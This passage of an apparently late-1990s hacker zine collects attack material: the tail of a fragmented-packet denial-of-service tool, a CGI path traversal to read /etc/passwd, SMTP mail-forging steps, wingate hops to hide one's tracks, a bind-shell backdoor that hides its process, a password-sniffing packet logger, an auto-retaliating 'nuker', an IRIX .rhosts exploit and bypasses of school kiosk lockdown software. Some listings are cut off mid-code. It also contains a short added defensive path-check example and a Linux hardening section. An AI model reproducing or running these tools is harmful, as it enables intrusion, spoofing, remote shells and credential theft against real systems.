    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);             /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6);                 /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;                   /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                                   /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;                  /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;                  /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt);         /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);         /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2);      /* UDP total length */

    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
               sizeof(struct sockaddr)) == -1) {
        perror("\nsendto");
        free(packet);
        exit(1);
    }

    /* third fragment */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);

    byte = 0x4F;                                  /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2;                                   /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242);             /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF);         /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40;                   /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4;                                   /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip;                  /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip;                  /* IP destination address */
    p_ptr += 44;
    *((u_short *)p_ptr) = htons(src_prt);         /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt);         /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING);     /* UDP total length */

    for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length);
    /* [the listing is truncated here: everything between the loop header
       above and the end of the address-resolution helper is missing] */
    }
    return (addr.s_addr);
}

void usage(u_char *name)
{
    fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name);
    exit(0);
}

(11)-----------SECURITY-------------------------------------------(11)

[Infoseek]--------------------------------------------------| optiklenz |

   http://www.infoseek.com/cgi/bin?/./view?/home/path

Swap bin for etc (etc., etc.), and you will receive the /etc/ directory
structure, which contains the passwd file.

The above exploits a discreet flaw in Infoseek's cgi. It can be used to view
various binaries and commands. If you are viewing it using a Netscape
browser, keep reloading the document; the output will change the binary
data. If you are using lynx you should receive the command binary and a
directory structure...

For example: /bin/

   http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd

In lynx, it will list the directory structure for the etc directory, ie:
/etc/

If you use lynx, you will be able to grab the .passwd file.
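The Infoseek CGI above accepted a path argument such as /./view?/home/path and served files from outside its document root. The following is an added example, not code from the zine or from Infoseek (whose CGI internals are not known): it shows the bug class as a naive handler that glues the request onto a root and only blacklists "..", beside a resolver that canonicalises the path and refuses anything that escapes the root, plus a detection hook a log scanner could use. The root path and request strings are constructed for illustration.

```python
import os

DOC_ROOT = "/srv/www"   # constructed example root, not Infoseek's real layout


def naive_resolve(root, requested):
    """The bug class: blacklist ".." and glue the request onto the root.

    os.path.join() discards `root` entirely when `requested` is absolute,
    so "/./etc/passwd" (which contains no "..") resolves to /etc/passwd.
    """
    if ".." in requested:
        return None
    return os.path.normpath(os.path.join(root, requested))


def safe_resolve(root, requested):
    """Hardened version: canonicalise first, then check containment.

    1. Strip leading slashes so the request is always relative to root.
    2. Canonicalise with realpath (collapses ".", "..", and symlinks).
    3. Accept only if the result still lies inside the canonical root.
    """
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def is_traversal_attempt(root, requested):
    """Detection hook for scanning request logs: True when the request is
    rejected outright, or when the naive handler would have served a file
    other than the one the hardened resolver maps it to."""
    naive = naive_resolve(root, requested)
    safe = safe_resolve(root, requested)
    if naive is None or safe is None:
        return True
    return os.path.realpath(naive) != safe


if __name__ == "__main__":
    # constructed requests: one legitimate, three in the Infoseek pattern
    for req in ("index.html", "/./etc/passwd", "../../etc/passwd",
                "docs/../../etc/shadow"):
        print(req, "naive ->", naive_resolve(DOC_ROOT, req),
              "| safe ->", safe_resolve(DOC_ROOT, req),
              "| attempt:", is_traversal_attempt(DOC_ROOT, req))
```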
(12)-----------SECURITY-------------------------------------------(12)

[Mail Forge]------------------------------------------------| optiklenz |

I wrote about this years ago, and decided to revise it. This exploits smtp
(port 25), allowing you to forge email from a remote host.

Unix/Linux users use:

   $ telnet url.host.net 25

Windows users use:

   c:\windows\telnet   <-- Enter url.host.net as the host to connect to,
                           and 25 as the port.

After connecting:

   220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at Label, day month/day/year 3 -0400 (EDT)

If it prompts with an "It's always polite to "helo"" message, then just
helo it.

   mail from: fake@faked.net        [ Commands:           ]
   then                             [ helo = call send    ]
   rcpt to: user@domain.net         [ mail = from sender  ]
                                    [ rcpt = to recipient ]
                                    [ vrfy = verify       ]
                                    [ help = help         ]

vrfy comes into play if things don't seem to be going right. For verify it
is good to know the uids of people who use the system you're forging from.
Use:

   vrfy uid   (user id)

Then type "data" and press enter. The first thing you'll type in is a
title; next is the body msg. Both should be on separate lines. Once
finished, type a --> . <-- then type quit, and press enter.

(13)-----------SECURITY-------------------------------------------(13)

[Wingate]---------------------------------------------------| optiklenz |

A short preface on wingating and its purposes. One is able to use an
exploit in certain systems to bounce from one host to another. A wingate
can be used for a system's benefit or its downfall. One way it can be used
is as a firewall to protect your host from outside attacks. Another use is
bouncing from one host to another to cover your tracks; this will put the
fault on the system you wingated from.

Unix/Linux usage:

   $ telnet wingate.net

Windows usage:

   Run a telnet client and connect to a wingate address via port 23.

Once prompted with " Wingate: " you then enter the location you want to
bounce to.
If using the wingate method to test your system's logging, it is good to
bounce through more than one wingate at a time.

Using Wingate as a socks host on IRC:

   Linux use (from ircii or BitchX, etc.):

      /server <wingate>:23
      /quote <irc.server>:6667

   Windows use:

      Enter the wingate location in your irc client's "FIREWALL/SOCKS HOST"
      query.

[Some Wingates For your Proxy Pleasure]

(14)-----------SECURITY-------------------------------------------(14)

[backdoor.c]---------------------------------------------------| jsbach |

/* backdoor.c by jsbach@bear.cs.zorg.edu. That dup2() shit was ripped from
   pluvius@io.org. Compiles fine on *BSD*, Linux, and Solaris (on Solaris
   -lsocket). To hide the process I strcpy("", argv[count]);, making it
   invisible on Solaris and pretty inconspicuous on BSD and Linux.

   Basically, this binds a program to a specified port and listens for a
   connection. When you exit the program, you DON'T get dropped to a shell,
   so you can let people bounce telnet connections off your box but not
   access anything else, or whatever.

   Example usage:  ./backdoor /bin/sh 31337 p@55w0rd &
              or:  ./backdoor /bin/sh 31337
*/

#define DATA "Hello. Please place semicolons after commands in shell mode :P\n---\n"

/* the header names did not survive the listing; these are the standard
   headers the calls below need */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>

int sockfd, count, clientpid, socklen, serverpid, temp, temp2, temp3;
struct sockaddr_in server_address;
struct sockaddr_in client_address;

main(int argc, int **argv)
{
    char password[ sizeof( argv[3] ) ];
    char passwordchk[ sizeof( argv[3] ) ];

    count=0;
    if (argc < 3) {
        printf("usage: %s program_to_run port_number password(optional)\n",argv[0]);
        exit(-1);
    }

    if (argc == 4) {
        strcpy((char *)&password, argv[3]);
        strcpy((char *)argv[3], "");
    }

    printf("\n-----\nDaemon running %s on port %d. PID is %d.\n-----\n",
           argv[1], atoi(argv[2]), getpid());

    sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);   /*add error checking*/
    bzero((char *) &server_address, sizeof(server_address));
    strcpy((char *)argv[0],"");
    server_address.sin_family=AF_INET;
    server_address.sin_port=htons(atoi(argv[2]));
    strcpy((char *)argv[2],"");
    server_address.sin_addr.s_addr=htonl(INADDR_ANY);
    bind(sockfd, (struct sockaddr *)&server_address, sizeof(server_address));
    listen(sockfd, 5);
    signal(SIGHUP, SIG_IGN);

    while(1) {
        socklen=sizeof(client_address);
        temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen);

        if(argc == 4) {
            while(1) {
                write(temp, "Password: ", 10);
                read(temp, &passwordchk, sizeof(password));
                if(strncmp(passwordchk, password, sizeof(password)) == 0)
                    break;
                bzero(passwordchk,sizeof(passwordchk));
            }
        }

        write(temp, DATA, sizeof(DATA));
        if (temp < 0)
            exit(0);

        clientpid=getpid();
        serverpid=fork();

        if (serverpid != 0) {
            dup2(temp,0);
            dup2(temp,1);
            dup2(temp,2);
            execl(argv[1],argv[1],(char *)0);
        }
        close(temp);
    }
}

(15)-----------SECURITY-------------------------------------------(15)

[IP Spoofing]-----------------------------------------------| optiklenz |

GENERAL:

- System A tries to open a connection to System B. System B accepts the
  connection (or not) and sends back a response; the connection gets
  established and interacted with.
- Requires trust between A and B.

SOURCE-ROUTE:

- System A wants to 'fake' one of your system's addresses to talk with
  System B (the address to be 'faked' is assumed to be trusted by B). The
  exact same thing happens as above, except the first-hop gateway from
  System A has been set up to route YOUR netmask to System A, and System A
  has been set up with the trusted address on your net. The other way is
  that System A is 'source routing' (LSR if distant) to your net with the
  first-hop's address in the route, so when System B answers its buddy, the
  trusted system, the packets are actually going to System A's first-hop
  and getting routed to System A.
  The fix is to disallow source-routing, of course.
- Requires control of first-hop routing from System A and that System B's
  net allows source-routing.

SPOOF (DNS spoofing):

- System A finds r* programs on System B and modifies the reverse DNS
  entries for System A to look like a system that B trusts. System A
  connects to System B; B looks up the DNS entry and gets back a host that
  B trusts. Easy, ugly. The fix is tcp-wrappers, or replace the r*'s.
- Requires control of the reverse DNS tables for System A's address and the
  default/stupid r* command daemons on System B.

SPOOF (DNS spoofing with cache poison):

- As above, but System A 'volunteers' an IP address in an MX record to
  System B's DNS cache so that if tcp-wrappers are running, the second
  lookup and compare will also succeed.

SPOOF (IP level 'blind' spoofing):

- System A shuts down the trusted host on your network via quirks in the
  implementations of TCP/IP (or waits for it to go down, or whatever).
  System A sends a non-source-routed connect packet to System B using the
  trusted host's network address, just like the trusted host would have
  done if it were initiating a connection. System B sends out the response
  to its buddy and it stays on the local subnet (why would it have any
  desire to leave?). System A never gets the response, but the seq#
  guessing code doesn't care; it just guesses the next seq# in the chain of
  packets that System B would expect and pretends it has an open connection
  (which to System B it does, but System A has no way of really knowing
  that; thus it (System A) is acting 'blind'). The point of the exercise is
  to send System B something that gives System A some kind of
  access/feedback. The fix: don't allow external packets into your network
  that have internal addresses.
- Requires System B's net to allow external packets with internal
  addresses.

GAINING TRUST RELATIONSHIP

One fashion of accomplishing this would be setting up a circumstantial
relationship between System A and System B.
In the home directory of System A create a .rhosts file:

   echo B uid > ~/.rhosts

and do the same on System B. The same method goes for SCO Unix: if you
rlogin as root to a system via a trusted host (one which is in
/etc/hosts.equiv), a passwd is not required.

VHOST vs SPOOFING

I've seen various people on irc who believe that because they are irc'ing
with a vhost, they are spoofed. That is definitely not the case. A Vhost
(Virtual Host) is merely the ability for a machine to be a web server for
multiple domains.

   vhost ie: advisory.legions.org <--[vhost]

(16)-----------SECURITY-------------------------------------------(16)

[Anal Sniff]--------------------------------------------------| chron1c |

/*
 Program Title : Anal Sniffer v.01
 Author        : chron1c
 Date          : 19 April 1998
 System        : Linux -- Tested on Slackware v3.x, Red Hat v4.x,
                 OpenLinux 1.x, and OpenBSD v2.x
 Web Page      : http://www.legions.org/chronic/
 Contacts      : chronic@legions.org
 Affiliation   : Legions Of the Underground http://www.legions.org
 Description   : Anal Sniffer v.01 is a program used to monitor TCP/IP
                 packets.
*/

#include ...    /* the 26 header names did not survive the listing */

#define ERR stderr

char *malloc();
char *device, *ProgName, *LogName;
FILE *LOG;
int debug=0;

#define NIT_DEV   "/dev/nit"
#define CHUNKSIZE 4096          /* Device buffer size.
                                 */
int if_fd = -1;
int Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg); exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg); exit(err); }

#define IP            ((struct ip *)Packet)
#define IPD           (ip->ip_dst)
#define IPeq(s,t)     ((s).s_addr == (t).s_addr)
#define IP_OFFSET     (0x1FFF)
#define IPHLEN        (ip->ip_hl)
#define IPLEN         (ntohs(ip->ip_len))
#define IPS           (ip->ip_src)
#define SZETH         (sizeof(struct ether_header))
#define TCPD          (tcph->th_dport)
#define TCPS          (tcph->th_sport)
#define TCPOFF        (tcph->th_off)
#define TCPFL(FLAGS)  (tcph->th_flags & (FLAGS))
#define MAXBUFLEN     (1000)

time_t LastTIME = 0;

struct CREC {
    struct CREC *Next, *Last;
    time_t Time;
    struct in_addr SRCip, DSTip;
    u_int SRCport,                /* src/dst ports */
          DSTport;
    u_char Data[MAXBUFLEN+2];
    u_int Length;
    u_int PKcnt;
    u_long LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{
    register struct hostent *he =
        gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr), AF_INET);
    return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{
    static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')
    SFL(0,TH_FIN, 'F');
    SFL(1,TH_SYN, 'S');
    SFL(2,TH_RST, 'R');
    SFL(3,TH_PUSH,'P');
    SFL(4,TH_ACK, 'A');
    SFL(5,TH_URG, 'U');
    iobuf[6]=0;
    return(iobuf);
}

char *SERVp(port)
register u_int port;
{
    static char buf[10];
    register char *p;

    switch(port) {
        case IPPORT_LOGINSERVER: p="rlogin"; break;
        case IPPORT_TELNET:      p="telnet"; break;
        case IPPORT_SMTP:        p="smtp";   break;
        case IPPORT_FTP:         p="ftp";    break;
        default: sprintf(buf,"%u",port); p=buf; break;
    }
    return(p);
}

char *Ptm(t)
register time_t *t;
{
    register char *p = ctime(t);
    p[strlen(p)-6]=0;           /* strip " YYYY\n" */
    return(p);
}

char *NOWtm()
{
    time_t tm;
    time(&tm);
    return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
    register struct CREC *CLtmp = \
        (struct CREC *)malloc(siz_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
    /* [the listing is truncated here: the rest of ADD_NODE, the node
       handling that follows it, and the start of the filter function are
       missing; the text resumes inside filter()] */
        }
    } else {
        if(TCPFL(TH_SYN)) {
            ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
        }
    }
    IDLE_NODE();
}

/* signal handler */
void death()
{
    register struct CREC *CLe;

    while(CLe=CLroot)
        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
    fflush(LOG);
    if(LOG != stdout)
        fclose(LOG);
    exit(1);
}

/* opens network interface, performs ioctls and reads from it,
 * passing data to filter function */
void do_it()
{
    int cc;
    char *buf;
    u_short sp_ts_len;

    if(!(buf=malloc(CHUNKSIZE)))
        Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
  {
    struct strioctl si;
    struct ifreq    ifr;
    struct timeval  timeout;
    u_int  chunksize = CHUNKSIZE;
    u_long if_flags  = NI_PROMISC;

    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
        Pexit(1,"Eth: nit open");

    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
        Pexit(1,"Eth: ioctl (I_SRDOPT)");

    si.ic_timout = INFTIM;

    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

    timeout.tv_sec = 1;
    timeout.tv_usec = 0;
    si.ic_cmd = NIOCSTIME;
    si.ic_len = sizeof(timeout);
    si.ic_dp  = (char *)&timeout;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

    si.ic_cmd = NIOCSCHUNK;
    si.ic_len = sizeof(chunksize);
    si.ic_dp  = (char *)&chunksize;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
    si.ic_cmd = NIOCBIND;
    si.ic_len = sizeof(ifr);
    si.ic_dp  = (char *)&ifr;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

    si.ic_cmd = NIOCSFLAGS;
    si.ic_len = sizeof(if_flags);
    si.ic_dp  = (char *)&if_flags;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
        Pexit(1,"Eth: ioctl (I_FLUSH)");
  }

    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
        register char *bp = buf,
                      *bufstop = (buf + cc);

        while
              (bp < bufstop) {
            register char *cp = bp;
            register struct nit_bufhdr *hdrp;

            hdrp = (struct nit_bufhdr *)cp;
            cp += sizeof(struct nit_bufhdr);
            bp += hdrp->nhb_totlen;
            filter(cp, (u_long)hdrp->nhb_msglen);
        }
    }
    Pexit((-1),"Eth: read");
}

/* Yo Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms"

void getauth()
{
    char *buf,*getpass(),*crypt();
    char pwd[21],prmpt[81];

    strcpy(pwd,AUTHPASSWD);
    sprintf(prmpt,"(%s)UP? ",ProgName);
    buf=getpass(prmpt);
    if(strcmp(pwd,crypt(buf,pwd)))
        exit(1);
}
*/

void main(argc, argv)
int argc;
char **argv;
{
    char cbuf[BUFSIZ];
    struct ifconf ifc;
    int s, ac=1, backg=0;

    ProgName=argv[0];

    /* getauth(); */

    LOG=NULL;
    device=NULL;
    while((acifr_name;
    /* [the listing is truncated here: the argument-parsing loop and the
       interface lookup between "while((ac" and "ifr_name;" are missing] */
    }

    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

    if(!LOG)
        LOG=stdout;

    signal(SIGINT, death);
    signal(SIGTERM,death);
    signal(SIGKILL,death);
    signal(SIGQUIT,death);

    if(backg && debug) {
        fprintf(ERR,"[Cannot bg with debug on]\n");
        backg=0;
    }

    if(backg) {
        register int s;

        if((s=fork())>0) {
            fprintf(ERR,"[pid %d]\n",s);
            exit(0);
        } else if(s<0)
            Pexit(1,"fork");

        if( (s=open("/dev/tty",O_RDWR))>0 ) {
            ioctl(s,TIOCNOTTY,(char *)NULL);
            close(s);
        }
    }

    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
    fflush(LOG);

    do_it();
}

(17)-----------SECURITY-------------------------------------------(17)

[Back Attack]---------------------------------------------------| chrak |

/* compile: cc nukeback.c -o nukeback -Wall
   let it run like a shell script that nukes them back or something
   run on port 1 to stop portscanners
   quickly written by chrak */

/* the header names did not survive the listing; these are the standard
   headers the calls below need */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void main(int argc, char **argv)
{
    int s_sock, c_sock, i;
    struct sockaddr_in s_info, c_info;
    char comline[66], *nuker;

    if(argc != 3) {
        printf("usage: %s port nuker\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    s_sock = socket(AF_INET, SOCK_STREAM, 0);
    s_info.sin_family = AF_INET;
    s_info.sin_addr.s_addr = htonl(INADDR_ANY);
    s_info.sin_port = htons(atoi(argv[1]));
    bind(s_sock, (struct sockaddr *)&s_info, sizeof(s_info));
    i = sizeof(c_info);
    listen(s_sock, 1);

    for(;;) {
        for(i=0;i<66;i++)
            comline[i] = '\0';
        i = sizeof(c_info);
        c_sock = accept(s_sock, (struct sockaddr *)&c_info, &i);
        send(c_sock, "bleh?\n", 6, 0);
        close(c_sock);
        nuker = inet_ntoa(c_info.sin_addr);
        printf("Connect from %s\n", nuker);
        sprintf(comline, "%s %s", argv[2], nuker);
        printf("Doing %s\n", comline);
        system(comline);
        printf("Waiting for next bitch...\n");
    }
}

(18)-----------SECURITY-------------------------------------------(18)

[IRIX LMR]--------------------------------------------------| optiklenz |

This is found to affect Irix 5.3, but 6.1 and 6.2 are also vulnerable. This
exploits license_eoe.sw.license_eoe.

Note: LicenseManager is the GUI used to license subsystems. It allows you
to install, update, and remove FLEXlm and NET_LS licenses. Any user with
access to an X screen would be able to run it.

   $ setenv netls_lincense_file /.rhosts
   $ /usr/etc/LicenseManager

(19)-----------SECURITY-------------------------------------------(19)

[Securing Linux]----------------------------------------------| BlackIC |

This will explain some basic security measures you can take after
installing a Linux system. This is based on a Slackware install, but the
information should be good for other distributions also.

First off, before you do anything you need to go to /etc/inetd.conf and
take out all the services you don't need; for now, comment them all out by
adding a # in front of the line. If you plan to use telnet and ftp, read
the later chapter on securing those services. Now, for the changes to take
effect, type ps, get the pid of inetd and type:

   kill -HUP <pid>

Next you will want to go to /etc/rc.d/rc.inet2 and comment out the
following lines:

# Start the SUN RPC Portmapper.
#if [ -f ${NET}/rpc.portmap ]; then
#  echo -n " portmap"
#  ${NET}/rpc.portmap
#fi
#
# Start the various SUN RPC servers.
if [ -f ${NET}/rpc.portmap ]; then
  # Start the NFS server daemons.
  if [ -f ${NET}/rpc.mountd ]; then
    echo -n " mountd"
    ${NET}/rpc.mountd

Now if you plan on having users on your system, I recommend getting sshd
installed for a more secure shell; you can read about and download it at
http://www.cs.hut.fi/ssh. Also make sure you have the most current kernel
(which at the time of this writing is 2.0.33). I also recommend getting the
Rhino9 Linux Security Auditor Tool available at rhino9.org; it will check
for suid programs and other possible security holes. Also, if you are gonna
give out shells, make sure you trust these people. Update your passwords at
least once a month or more, and make sure they're good passwords; not like
"god", "password1", "dog", etc. An example of a good one is
"x3toyC34j8gg2". If you're reading this, that means you probably have a
newer distribution, so it already has shadow passwords built in; I wouldn't
recommend trying to install them if you don't, due to the fact I have seen
a few people have big probs because of it.

This guide was not meant to insure your security in any way, just because
new exploits come out all the time, so keep yourself updated at cert.org or
rootshell.com. Also as a final note, your system will never be 100% secure,
as no system is, so like um don't blame me if you get fucked over.

(20)-----------SECURITY-------------------------------------------(20)

[FoolProof]---------------------------------------------| Duncan Silver |

In's and Out's of FoolProof Control (not so FoolProof After All)

I thought long and relatively hard about what my article is going to be
about.
Instead of bombarding you with yet another "l33t" article on
vulnerabilities and things that have been written about over and over, I
decided to bring you something new, and while it may not be as glamorous as
some of the other topics I could have chosen, at least it is completely new
and unknown (to the best of my knowledge). Hope you find it useful.

- Duncan Silver

--------------------------
What is FoolProof Control:

FoolProof Control is a security program manufactured by SmartStuff
Software, designed for Windows 3.1, Windows 95, and MacOS. The purpose of
this program is to restrict access to certain programs and devices (for
example, the default setup locks out access to the hard drive, any
preferences, options, etc.). This program is quite useful (and widely used)
in public institutions like schools and libraries.

FoolProof is basically a simple TSR (terminate and stay resident) program,
executed at startup time (yes, in some cases it can be bypassed by
ctrl+break during startup). The restricted features are considered locked
by the computer, and are simply not available. To unlock the restricted
features, you need to enter the password.

----------------------------
A Word on FoolProof Passwords:

FoolProof privileged users are divided into two categories: the users with
access to all features, and users with access to the FoolProof
configuration itself. This simply means that there are two means of
authorization, the first being clicking on the FoolProof icon and entering
the password (minimum of six characters), which gives you access to the
FoolProof configuration, and the second being the hotkey.

Now, I found the hotkey feature to be quite interesting. You see, the
hotkey is a set of four keys which need to be pressed at the same time.
When this occurs, FoolProof is removed from memory, enabling all the
features. You are free to do as you please; however, you are still unable
to configure FoolProof or change the hotkey.

After messing around with it for a long time (and installing some key
loggers) I found that the hotkey always consists of CTRL+SHFT+two alphabet
characters. I'm not sure if this is only how they do it at the place where
I tested it, or if this is a requirement.

-----------------------------
Now that we have an idea of what it is, and what it does, we can move into
the interesting part: defeating it.
-----------------------------

Preamble:

I spent quite some time messing around with FoolProof Control, and I have
discovered a major flaw affecting all the versions released so far. I wrote
to SmartStuff explaining this problem, and about a month later I received
mail from them stating that they have been "unable to reproduce the
problem." It's quite obvious that their response is B.S., since I have
exploited this vulnerability on several different sites.

----------------------------
Windows 95 + 3.1 DA FLAW:

This is quite funny actually, but while messing around on one of these
FoolProof protected machines, I came upon a wondrous idea. In the location
window I entered: c:\. Needless to say, the "protected" contents of the
hard drive appeared before me. I was now able to execute any binary file
simply by clicking on it. However, I wanted more; I wanted to disable this
FoolProof joke for good. It turns out that if you try to open autoexec,
Netscape will execute it, which does you no good. The way around this is to
right click on the autoexec.bat file and then choose Edit. The contents of
autoexec are displayed in NotePad; after removing any references to
FoolProof, do the same thing with config.sys. After saving both files,
simply reboot.

WHY oh WHY does this work? Well, for the technical part of it, FoolProof
restricts access to USERS, and when I typed c:\ in the Netscape location
window, the machine saw me as NETSCAPE instead of a USER. Same thing with
saving autoexec.bat and config.sys to the drive: FoolProof thinks that
Netscape is trying to save these files, and since Netscape is a program, it
has every right to do whatever da fuck it wants to do. Pretty simple, eh?

------------------------
Macintosh:

Well, what can I say? I was never much of a Macintosh fan. Somebody went
ahead of me in writing an article on defeating FoolProof for Macintosh, so
the full credit for this section goes to tristan_durie@starbase.ca.

1. One way to disable FoolProof is to hold down the space bar when booting
   up the computer. The Extensions Manager will then appear and you can
   then turn off the FoolProof Extension. (You can also just hold down the
   Shift key when you start up. This will turn off the Extensions. This
   only works when the admin of the computer has set up FoolProof so that
   it doesn't ask for a password to access the hard drive, so using the
   shift key doesn't usually work.)

2. Drag a folder (other than the Extensions Folder) onto the Launcher and
   it will then make an alias in the Launcher Items folder. You can then
   drag the FoolProof extension onto the alias of the folder on the
   Launcher. This will move the FoolProof Extension into the folder.
   Restart the computer and the FoolProof Extension will no longer be in
   the Extensions Folder and FoolProof will be disabled. (This method is
   also useful for moving files around the hard drive when FoolProof
   disables dragging.)

3. Create an AppleScript program with a script like this:

      tell application "Finder"
          activate
          choose file
          copy the result to File1
          choose folder
          copy the result to Folder1
          move File1 to Folder1
      end tell

   Run this script and choose the FoolProof Extension and then choose a
   folder other than the Extensions folder. Restart the computer and
   FoolProof should be disabled.

4. Run DropStuff and stuff the FoolProof Extension, being sure to click the
   "delete file after stuffing" check box. Press OK and restart the
   computer after it has finished stuffing. The FoolProof Extension will be
   compressed so it won't work (the original FoolProof extension was
   deleted because you checked the "delete file after stuffing" check box).

5. If the Get Info command is disabled and you want to unlock something or
   change the memory allocation, search for the file that you want to
   change using FindFile. You can get info on files in the FindFile window.
   This is fairly useful for unlocking the FoolProof Control Panel,
   preferences or the FoolProof Extension, because they lock every time you
   restart or open the FoolProof Control Panel. You can also use this
   method to replace the FoolProof extension, Control Panel or Preferences,
   because you can't replace them if they are locked. (The older version of
   FoolProof allows you to move files into the Trash and other folders
   using FindFile.)

6. If you can run programs from a disk it is very simple to disable
   FoolProof. Make a program that deletes the FoolProof extension, or you
   could use ResEdit to delete all the resources from the FoolProof
   Extension and restart.

7. All of the settings for the FoolProof options are stored in the
   FoolProof preferences. You can change the settings by switching the
   preferences file with the one I have provided with this stack.
   Unfortunately, the password is already set to one that I don't know, but
   password protection is disabled. All the settings are disabled when you
   install this preference file.

8. If you can't run programs off disks but you can use documents, you can
   create a HyperCard stack using HyperCard externals that will delete the
   FoolProof Extension. You can then run this stack using HyperCard Player
   on the protected computer.

------------------------
One more stupid trick:

Another stupid trick the "FoolProof Administrators" like to do is to
disable only certain menus of the applications. Let me give you an example:
after deciding that we cannot have students running wherever they please on
the Internet, the administration bought a membership to some gay-assed
proxy server named Bess which restricts access to anything that could even
remotely be considered fun (no, I'm not talking about porn, you sick0's).
Well, normally we would start Netscape, go to the Options menu, select
Network Preferences (or Edit->Preferences in Communicator), turn off the
proxies and go about our business. FoolProof allowed admins to disable the
Options menu. To bypass this idiocy, simply go to Netscape Mail; notice how
a new window opens, containing all the menus including Options. Many times
admins forget to disable these menus (well, actually all the time ;). So,
that's another thing you might want to try.

-------------------------
What FoolProof makers say about their product:

"FoolProof Security, the most advanced version of the desktop security
licensed on over one million school computers, is the market leader.
FoolProof Security first began provide protection of systems and hard
drives in 1993. The current version provides work groups with distinct
privileges, including where users can save documents, program access,
including internet programs and control of software downloaded from the
internet."

What I say about their product: "haha"

--------------------------
Conclusion:

In conclusion, FoolProof is an expensive piece of software that's
definitely not worth it. It's a piece of crap, and very easily defeated. If
you are an administrator planning to implement some security on DOS or
Windows machines, I recommend Fortress software.
